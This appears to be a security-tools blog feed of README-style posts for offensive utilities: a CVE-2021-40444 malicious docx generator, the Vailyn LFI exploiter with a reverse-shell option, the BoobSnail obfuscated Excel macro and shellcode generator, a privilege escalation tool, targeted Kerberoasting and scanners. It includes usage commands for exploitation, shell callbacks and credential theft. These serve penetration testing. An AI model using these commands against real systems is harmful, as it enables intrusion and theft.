DNS takeover vulnerabilities occur when a subdomain (subdomain.example.com) or domain has its authoritative nameserver set to a provider (e.g. AWS Route 53, Akamai, Microsoft Azure, etc.) but the hosted zone has been removed or deleted. Consequently, when making a request for DNS records the server responds with a SERVFAIL error. This allo ws an attacker to create the missing hosted zone on the service that was being used and thus control all DNS records for that (sub)domain.ΒΉ


Installation

from Binary

The ez way! You can download a pre-built binary from releases page, just unpack and run!


from Source
NOTE: Go 1.16+ compiler should be installed & configured!

Very quick & clean!

β–Ά go install github.com/pwnesia/dnstake/cmd/[email protected]

β€” or

Manual building executable from source code:

β–Ά git clone https://github.com/pwnesia/dnstake
β–Ά cd dnstake/cmd/dnstake
β–Ά go build .
β–Ά (sudo) mv dnstake /usr/local/bin

Usage
$ dnstake -h

Β·β–„β–„β–„β–„ ▐ β–„ .β–„β–„ Β·β–„β–„β–„β–„β–„ β–„β–„β–„Β· β–„ β€’β–„ β–„β–„β–„ .
β–ˆβ–ˆβ–ͺ β–ˆβ–ˆ β€’β–ˆβ–Œβ–β–ˆβ–β–ˆ β–€.β€’β–ˆβ–ˆ β–β–ˆ β–€β–ˆ β–ˆβ–Œβ–„β–Œβ–ͺβ–€β–„.β–€Β·
β–β–ˆΒ· β–β–ˆβ–Œβ–β–ˆβ–β–β–Œβ–„β–€β–€β–€β–ˆβ–„β–β–ˆ.β–ͺβ–„β–ˆβ–€β–€β–ˆ ▐▀▀▄·▐▀▀β–ͺβ–„
β–ˆβ–ˆ. β–ˆβ–ˆ β–ˆβ–ˆβ–β–ˆβ–Œβ–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆβ–ŒΒ·β–β–ˆ β–ͺβ–β–Œβ–β–ˆ.β–ˆβ–Œβ–β–ˆβ–„β–„β–Œ
β–€β–€β–€β–€β–€β€’ β–€&#9600 ; β–ˆβ–ͺ β–€β–€β–€β–€ β–€β–€β–€ β–€ β–€ Β·β–€ β–€ β–€β–€β–€

(c) pwnesia.org β€” v0.0.1

Usage:
[stdin] | dnstake [options]
dnstake -t HOSTNAME [options]

Options:
-t, --target <HOST/FILE> Define single target host/list to check
-c, --concurrent <i> Set the concurrency level (default: 25)
-s, --silent Suppress errors and/or clean output
-h, --help Display its help

Examples:
dnstake -t (sub.)domain.tld
dnstake -t hosts.txt
cat hosts.txt | dnstake
subfinder -silent -d domain.tld | dnstake

Workflow

DNSTake use RetryableDNS client library to send DNS queries. Initial engagement using Google & Cloudflare DNS as the resolver, then check & fingerprinting the nameservers of target host β€” if there is one, it will resolving the target host again with its nameserver IPs as resolver, if it gets weird DNS status response (other than NOERROR/NXDOMAIN), then it's vulnerable to be taken over. More or less like this in form of a diagram.

Currently supported DNS providers, see here.


References

License

DNSTake is distributed under MIT. See LICENSE.



CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

16 September 2021 at 13:13
By: Zion3R


Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)


Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

Check REPRODUCE.md for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab


Using

First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()

python3 exploit.py generate test/calc.dll http://<SRV IP>



Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80



Finally try the docx in a Windows Virtual Machine:

Β 


Plution - Prototype Pollution Scanner Using Headless Chrome

16 September 2021 at 11:30
By: Zion3R


Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: https://github.com/BlackFan/client-side-prototype-pollution/tree/master/pp


What this is not

This is not a one stop shop. Prototype pollution is a complicated beast. This tool does nothing you couldn't do manually. This is not a polished bug-free super tool. It is functional but poorly coded and to be considered alpha at best.


How it works

Plution appends a payload to supplied URLs, naviguates to each URL with headless chrome and runs javascript on the page to verify if a prototype was successfully polluted.


how it is used
  • Basic scan, output only to screen:
    cat URLs.txt | plution

  • Scan with a supplied payload rather than hardcoded one:
    cat URLs.txt|plution -p '__proto__.zzzc=example'
    Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

  • Output:
    Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

  • Concurrency:

  • Pass the '-c' option to specify how many concurrent jobs are run (default is 5)


questions and answers
  • How do I install it?
    go get -u github.com/raverrr/plution

  • why specifically limit it to checking if window.zzzc is defined?
    zzzc is a short pattern that is unlikely to already be in a prototype. If you want more freedom in regards to the javascript use https://github.com/detectify/page-fetch instead

  • Got a more specific question?
    Ask me on twitter @divadbate.



Kali Linux 2021.3 - Penetration Testing and Ethical Hacking Linux Distribution

16 September 2021 at 03:00
By: Zion3R


Time for another Kali Linux release! – Kali Linux 2021.1. This release has various impressive updates.

A summary of the changes since the 2021.2 release from June are:

  • OpenSSL - Wide compatibility by default - Keep reading for what that means
  • New Kali-Tools site - Following the footsteps of Kali-Docs, Kali-Tools has had a complete refresh
  • Better VM support in the Live image session - Copy & paste and drag & drop from your machine into a Kali VM by default
  • New tools - From adversary emulation, to subdomain takeover to Wi-Fi attacks
  • Kali NetHunter smartwatch - first of its kind, for TicHunter Pro
  • KDE 5.21 - Plasma desktop received a version bump

Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python

15 September 2021 at 20:30
By: Zion3R


Vailyn


Phased Path Traversal & LFI Attacks

Vailyn 3.0

Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use --lfi to include them in the scan.


About

Vailyn is a multi-phased vulnerability analysis and exploitation tool for path traversal and file inclusion vulnerabilities. It is built to make it as performant as possible, and to offer a wide arsenal of filter evasion techniques.


How does it work?

Vailyn operates in 2 phases. First, it checks if the vulnerability is present. It does so by trying to access /etc/passwd (or a user-specified file), with all of its evasive payloads. Analysing the response, payloads that worked are separated from the others.

Now, the user can choose freely which payloads to use. Only these payloads will be used in the second phase.

The second phase is the exploitation phase. Now, it tries to leak all possible files from the server using a file and a directory dictionary. The search depth and the directory permutation level can be adapted via arguments. Optionally, it can download found files, and save them in its loot folder. Alternatively, it will try to obtain a reverse shell on the system, letting the attacker gain full control over the server.

Right now, it supports multiple attack vectors: injection via query, path, cookie and POST data.


Why the phase separation?

The separation in several phases is done to hugely improve the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This resulted in a huge overhead due to payloads being always used again, despite not working for the current page.


Installation

Recommended & tested Python versions are 3.7+, but it should work fine with Python 3.5 & Python 3.6, too. To install Vailyn, download the archive from the release tab, or perform

$ git clone https://github.com/VainlyStrain/Vailyn

Once on your system, you'll need to install the Python dependencies.


Unix Systems

On Unix systems, it is sufficient to run

$ pip install -r requirements.txt   # --user

Windows

Some libraries Vailyn uses do not work well with Windows, or will fail to install.

If you use Windows, use pip to install the requirements listed in Vailyn\Β·β€Ί\requirements-windows.txt.

If twisted fails to install, there is an unofficial version available here, which should build under Windows. Just bear in mind that this is a 3rd party download, and the integrity isn't necessarily guaranteed. After this installed successfully, running pip again on requirements-windows.txt should work.


Final Steps

If you want to fully use the reverse shell module, you'll need to have sshpass, ncat and konsole installed. Package names vary by Linux distribution. On Windows, you'll need to start the listener manually beforehand. If you don't like konsole, you can specify a different terminal emulator in core/config.py.

That's it! Fire Vailyn up by moving to its installation directory and performing

$ python Vailyn -h

Usage

Vailyn has 3 mandatory arguments: -v VIC, -a INT and -p2 TP P1 P2. However, depending on -a, more arguments may be required.

   ,                \                  /               , 
':. \. /\. ./ .:'
':;. :\ .,:/ ''. /; ..::'
',':.,.__.'' ' ' `:.__:''.:'
';.. ,;' *
* '., .:'
`v;. ;v' o
. ' '.. :.' ' .
' ':;, ' '
o ' . :
*
| Vailyn |
[ VainlyStrain ]

Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2
[-p PAM] [-i F] [-Pi VIC2]
[-c C] [-n] [-d I J K]
[-s T] [-t] [-L]
[-l] [-P] [-A]

mandatory:
-v VIC, --victim VIC Target to attack, part 1 [pre-payload]
-a INT, --attack INT Attack type (int, 1-5, or A)< br/>
A| Spider (all) 2| Path 5| POST Data, json
P| Spider (partial) 3| Cookie
1| Query Parameter 4| POST Data, plain

-p2 TP P1 P2, --phase2 TP P1 P2
Attack in Phase 2, and needed parameters

β”Œ[ Values ]─────────────┬────────────────────┐
β”‚ TP β”‚ P1 β”‚ P2 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ leak β”‚ File Dict β”‚ Directory Dict β”‚
β”‚ inject β”‚ IP Addr β”‚ Listening Port β”‚
β”‚ implant β”‚ Source File β”‚ Server Destination β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

additional:
-p PAM, --param PAM query parameter or POST data for --attack 1, 4, 5
-i F, --check F File to check for in Phase 1 (df: etc/passwd)
-Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload]
-c C, --cookie C Cookie to append (in header format)
-l, --loot Download found files into the loot folder
-d I J K, --depths I J K
depths (I: phase 1, J: phase 2, K: permutation level )
-h, --help show this help menu and exit
-s T, --timeout T Request Timeout; stable switch for Arjun
-t, --tor Pipe attacks through the Tor anonymity network
-L, --lfi Additionally use PHP wrappers to leak files
-n, --nosploit skip Phase 2 (does not need -p2 TP P1 P2)
-P, --precise Use exact depth in Phase 1 (not a range)
-A, --app Start Vailyn's Qt5 interface

develop:
--debug Display every path tried, even 404s.
--version Print program version and exit.
--notmain Avoid notify2 crash in subprocess call.

Info:
to leak files using absolute paths: -d 0 0 0
to get a shell using absolute paths: -d 0 X 0

Vailyn currently supports 5 attack vectors, and provides a crawler to automate all of them. The attack performed is identified by the -a INT argument.

INT        attack
---- -------
1 query-based attack (https://site.com?file=../../../)
2 path-based attack (https://site.com/../../../)
3 cookie-based attack (will grab the cookies for you)
4 plain post data (ELEM1=VAL1&ELEM2=../../../)
5 json post data ({"file": "../../../"})
A spider fetch + analyze all URLs from site using all vectors
P partial spider fetch + analyze all URLs from site using only selected vectors

You also must specify a target to attack. This is done via -v VIC and -Pi VIC2, where -v is the part before the injection point, and -Pi the rest.

Example: if the final URL should look like: https://site.com/download.php?file=<ATTACK>&param2=necessaryvalue, you can specify -v https://site.com/download.php and -Pi &param2=necessaryvalue (and -p file, since this is a query attack).

If you want to include PHP wrappers in the scan (like php://filter), use the --lfi argument. At the end of Phase 1, you'll be presented with an additional selection menu containing the wrappers that worked. (if any)

If the attacked site is behind a login page, you can supply an authentication cookie via -c COOKIE. If you want to attack over Tor, use --tor.


Phase 1

This is the analysis phase, where working payloads are separated from the others.

By default, /etc/passwd is looked up. If the server is not running Linux, you can specify a custom file by -i FILENAME. Note that you must include subdirectories in FILENAME. You can modify the lookup depth with the first value of -d (default=8). If you want to use absolute paths, set the first depth to 0.


Phase 2

This is the exploitation phase, where Vailyn will try to leak as much files as possible, or gain a reverse shell using various techniques.

The depth of lookup in phase 2 (the maximal number of layers traversed back) is specified by the second value of the -d argument. The level of subdirectory permutation is set by the third value of -d.

If you attack with absolute paths and perform the leak attack, set all depths to 0. If you want to gain a reverse shell, make sure that the second depth is greater than 0.

By specifying -l, Vailyn will not only display files on the terminal, but also download and save the files into the loot folder.

If you want a verbose output (display every output, not only found files), you can use --debug. Note that output gets really messy, this is basically just a debug help.

To perform the bruteforce attack, you need to specify -p2 leak FIL PATH, where

  • FIL is a dictionary file containing filenames only (e.g. index.php)
  • PATH, is a dictionary file containing directory names only. Vailyn will handle directory permutation for you, so you'll need only one directory per line.

To gain a reverse shell by code injection, you can use -p2 inject IP PORT, where

  • IP is your listening IP
  • PORT is the port you want to listen on.

WARNING

Vailyn employs Log Poisoning techniques. Therefore, YOUR SPECIFIED IP WILL BE VISIBLE IN THE SERVER LOGS.

The techniques (only work for LFI inclusions):

  • /proc/self/environ inclusion only works on outdated servers
  • Apache + Nginx Log Poisoning & inclusion
  • SSH Log Poisoning
  • poisoned mail inclusion
  • wrappers
    • expect://
    • data:// (plain & b64)
    • php://input

False Positive prevention

To distinguish real results from false positives, Vailyn does the following checks:

  • check the status code of the response
  • check if the response is identical to one taken before attack start: this is useful e.g, when the server returns 200, but ignores the payload input or returns a default page if the file is not found.
  • similar to #2, perform an additional check for query GET parameter handling (useful when server returns error that a needed parameter is missing)
  • check for empty responses
  • check if common error signatures are in the response content
  • check if the payload is contained in the response: this is an additional check for the case the server responds 200 for non-existing files, and reflects the payload in a message (like ../../secret not found)
  • check if the entire response is contained in the init check response: useful when the server has a default include which disappears in case of 404
  • for -a 2, perform an additional check if the response content matches the content from the server root URL
  • REGEX check for /etc/passwd if using that as lookup file

Examples
  • Simple Query attack, leaking files in Phase 2: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file --> http://site.com/download.php?file=../INJECT

  • Query attack, but I know a file file.php exists on exactly 2 levels above the inclusion point: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P This will shorten the duration of Phase 1 very much, since its a targeted attack.

  • Simple Path attack: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs --> http://site.com/../INJECT

  • Path attack, but I need query parameters and tag: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs -Pi "?token=X#title" --> http://site.com/../INJECT?token=X#title

  • Simple Cookie attack: $ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs Will fetch cookies and you can select cookie you want to poison

  • POST Plain Attack: $ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&DATA2=INJECT" will infect DATA2 with the payload

  • POST JSON Attack: $ Vailyn -v "http://site.com/download.php" -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}'

  • Attack, but target is behind login screen: $ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar"

  • Attack, but I want a reverse shell on port 1337: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection (will start a ncat listener for you if on Unix)

  • Full automation in crawler mode: $ Vailyn -v "http://root-url.site" -a A you can also specify other args, like cookie, depths, lfi & lookup file here

  • Full automation, but Arjun needs --stable: $ Vailyn -v "http://root-url.site" -a A -s ANY


Demo

A phased, evasive Path Traversal + LFI scanning &amp; exploitation tool in Python (4) Vailyn's Crawler analyzing a damn vulnerable web application. LFI Wrappers are not enabled.

GUI Demonstration (v2.2.1-5)


Possible Issues

Found some false positives/negatives (or want to point out other bugs/improvements): please leave an issue!


Code of Conduct

Vailyn is provided as an offensive web application audit tool. It has built-in functionalities which can reveal potential vulnerabilities in web applications, which could be exploited maliciously.

THEREFORE, NEITHER THE AUTHOR NOR THE CONTRIBUTORS ARE RESPONSIBLE FOR ANY MISUSE OR DAMAGE DUE TO THIS TOOLKIT.

By using this software, the user obliges to follow their local laws, to not attack someone else's system without explicit permission from the owner, or with malicious intent.

In case of an infringement, only the end user who committed it is accountable for their actions.


Credits & Copyright

Vailyn: Copyright Β© VainlyStrain

Arjun: Copyright Β© s0md3v

Arjun is no longer distributed with Vailyn. Install its latest version via pip.



Rootend - A *Nix Enumerator And Auto Privilege Escalation Tool

15 September 2021 at 11:30
By: Zion3R


rootend is a python *nix Enumerator & Auto Privilege Escalation tool.

For a full list of our tools, please visit our website https://www.twelvesec.com/

Written by:


Usage
Enumeration & Automation Privilege Escalation tool. rootend is an open source tool licensed under GPLv3. Affected systems: *nix. Written by: @nickvourd of @twelvesec. Special thanks to @maldevel & servo. https://www.twelvesec.com/ Please visit https://github.com/twelvesec/rootend for more.. optional arguments: -h, --help show this help message and exit -v, --version show version and exit -a, --auto automated privilege escalation process -m, --manual system enumeration -n, --nocolor disable color -b, --banner show banner and exit -s, --suid suid binary enumeration -w, --weak weak permissions of files enumeration -p, --php PHP configuration files enumeration -c, --capabilities capabilities enumeration -f, --full-writables world writable files enumeration usage examples: ./rootend.py -a ./rootend.py -m ./rootend.py -v ./rootend.py -b Specific categories usage examples: ./rootend.py -a -s ./rootend.py -m -w ./rootend.py -a -s -p ./rootend.py -m -w -c -p ./rootend.py -a -s -c -p -f *Use the above arguments with -n to disable color. ">
___________              .__                _________              
\__ ___/_ _ __ ____ | |___ __ ____ / _____/ ____ ____
| | \ \/ \/ // __ \| |\ \/ // __ \ \_____ \_/ __ \_/ ___\
| | \ /\ ___/| |_\ /\ ___/ / \ ___/\ \___
|____| \/\_/ \___ >____/\_/ \___ >_______ /\___ >\___ >
\/ \/ \/ \/ \/
rootend v.2.0.2 - Enumeration & Automation Privilege Escalation tool.
rootend is an open source tool licensed under GPLv3.
Affected systems: *nix.
Written by: @nickvourd of @twelvesec.
Special thanks to @maldevel & servo.
https://www.twelvesec.com/
Please visit https://github.com/twelvesec/rootend for more..

optional arguments:
-h, --help show this help message and exit
-v, --version show version and exit
-a, --auto automated privilege escalatio n process
-m, --manual system enumeration
-n, --nocolor disable color
-b, --banner show banner and exit
-s, --suid suid binary enumeration
-w, --weak weak permissions of files enumeration
-p, --php PHP configuration files enumeration
-c, --capabilities capabilities enumeration
-f, --full-writables world writable files enumeration

usage examples:
./rootend.py -a
./rootend.py -m
./rootend.py -v
./rootend.py -b

Specific categories usage examples:
./rootend.py -a -s
./rootend.py -m -w
./rootend.py -a -s -p
./rootend.py -m -w -c -p
./rootend.py -a -s -c -p -f

*Use the above arguments with -n to disable color.


Version

2.0.2

Supports
  • Python 2.x
  • Python 3.x

Tested on
  • Python 2.7.18rc1
  • Python 3.8.2

Modes
  • Manual
  • Auto

Exploitation Categories

Suid Binaries:
  • General Suids
  • Suids for reading files
  • Suids for creating file as root
  • Limited Suids
  • Custom Suids

Weak Permissions:
  • /etc/passwd
  • /etc/shadow
  • apache2.conf
  • httpd.conf
  • redis.conf
  • /root

Weak Ownership:
  • /etc/passwd
  • /etc/shadow
  • apache2.conf
  • httpd.conf
  • redis.conf
  • /root

Capabilities:
  • General Capabilities
  • Custom Capabilities
  • With CAP_SETUID

Interesting Files:
  • PHP Configuration Files
  • World Writable Files


BoobSnail - Allows Generating Excel 4.0 XLM Macro

14 September 2021 at 20:30
By: Zion3R


BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:

  • various infection techniques;
  • various obfuscation techniques;
  • translation of formulas into languages other than English;
  • can be used as a library - you can easily write your own generator.

Building and Running

Tested on: Python 3.8.7rc1

pip install -r requirements.txt
python boobsnail.py
___. ___. _________ .__.__
\_ |__ ____ ____\_ |__ / _____/ ____ _____ |__| |
| __ \ / _ \ / _ \| __ \ \_____ \ / \__ \ | | |
| \_\ ( <_> | <_> ) \_\ \/ \ | \/ __ \| | |__
|___ /\____/ \____/|___ /_______ /___| (____ /__|____/
\/ \/ \/ \/ \/
Author: @_mzer0 @stm_cyber
(...)

Generators usage
python boobsnail.py <generator> -h

To display available generators type:

python boobsnail.py

Examples

Generate obfuscated macro that injects x64 or x86 shellcode:

python boobsnail.py Excel4NtDonutGenerator --inputx86 <PATH_TO_SHELLCODE> --inputx64 <PATH_TO_SHELLCODE> --out boobsnail.csv

Generate obfuscated macro that runs calc.exe:

python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv

Saving output in Excel
  1. Dump output to CSV file.
  2. Copy content of CSV file.
  3. Run Excel and create a new worksheet.
  4. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
  5. Paste the content in cell A1 or R1C1.
  6. Click Data -> Text to Columns.
  7. Click Next -> Set Semicolon as separator and click Finish.

Library usage

BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator:

  • excel4lib.macro.Excel4Macro - allows to defining Excel4 formulas, values variables;
  • excel4lib.macro.obfuscator.Excel4Obfuscator - allows to obfuscate created instructions in Excel4Macro;
  • excel4lib.lang.Excel4Translator - allows translating formulas to another language.

The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let's create a simple macro that runs calc.exe

from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=EXEC(cmd);

Now let's say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:

from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

For now excel4lib shares two obfuscation classes:

  • excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro;
  • excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfusacte formulas.

As you can see you can write your own obfuscator class and use it in Excel4Macro.

Sometimes you will need to translate your macro to another language for example your native language, in my case it's Polish. With excel4lib it's pretty easy. You just need to import Excel4Translator class and call set_language

from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);

For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory.

For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));

As you can see ".exe" string was passed to CONCATENATE formula as R2C1. R2C1 is address of ".exe" value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;

Author

mzer0 from stm_cyber team!


Articles

The first step in Excel 4.0 for Red Team

BoobSnail - Excel 4.0 macro generator



targetedKerberoast - Kerberoast With ACL Abuse Capabilities

14 September 2021 at 11:30
By: Zion3R


targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting. This tool can be used against all users of a domain, or supplied in a list, or one user supplied in the CLI.

More information about this attack


Usage

This tool supports the following authentications

Among other things, targetedKerberoast supports multi-level verbosity, just append -v, -vv, ... to the command :)

Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line --no-pass don't ask for password (useful for -k) -p PASSWORD, --password PASSWORD password to authenticate with -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH NT/LM hashes, format is LMhash:NThash --aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits) ">
usage: targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER]
[-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]

Queries target domain for SPNs that are running under a user account and operate targeted Kerberoasting

optional arguments:
-h, --help show this help message and exit
-v, --verbose verbosity level (-v for verbose, -vv for debug)
-q, --quiet show no information at all
-D TARGET_DOMAIN, --target-domain TARGET_DOMAIN
Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
-U USERS_FILE, --users-file USERS_FILE
File with user per line to test
--request-user username
Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
-o OUTPUT_FILE, --output-file OUTPUT_FILE
Output filename to write ciphers in JtR/hashcat format
--use-ldaps Use LDAPS instead of LDAP
--only-abuse Ignore accounts that already have an SPN and focus on targeted Kerberoasting
--no-abuse Don't attempt targeted Kerberoasting

authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with

secrets:
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameter s. If valid credentials cannot be found, it will use the ones specified in the
command line
--no-pass don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)

Below is an example what the tool can do.


Credits and references

Credits to the whole team behind Impacket and its contributors.



❌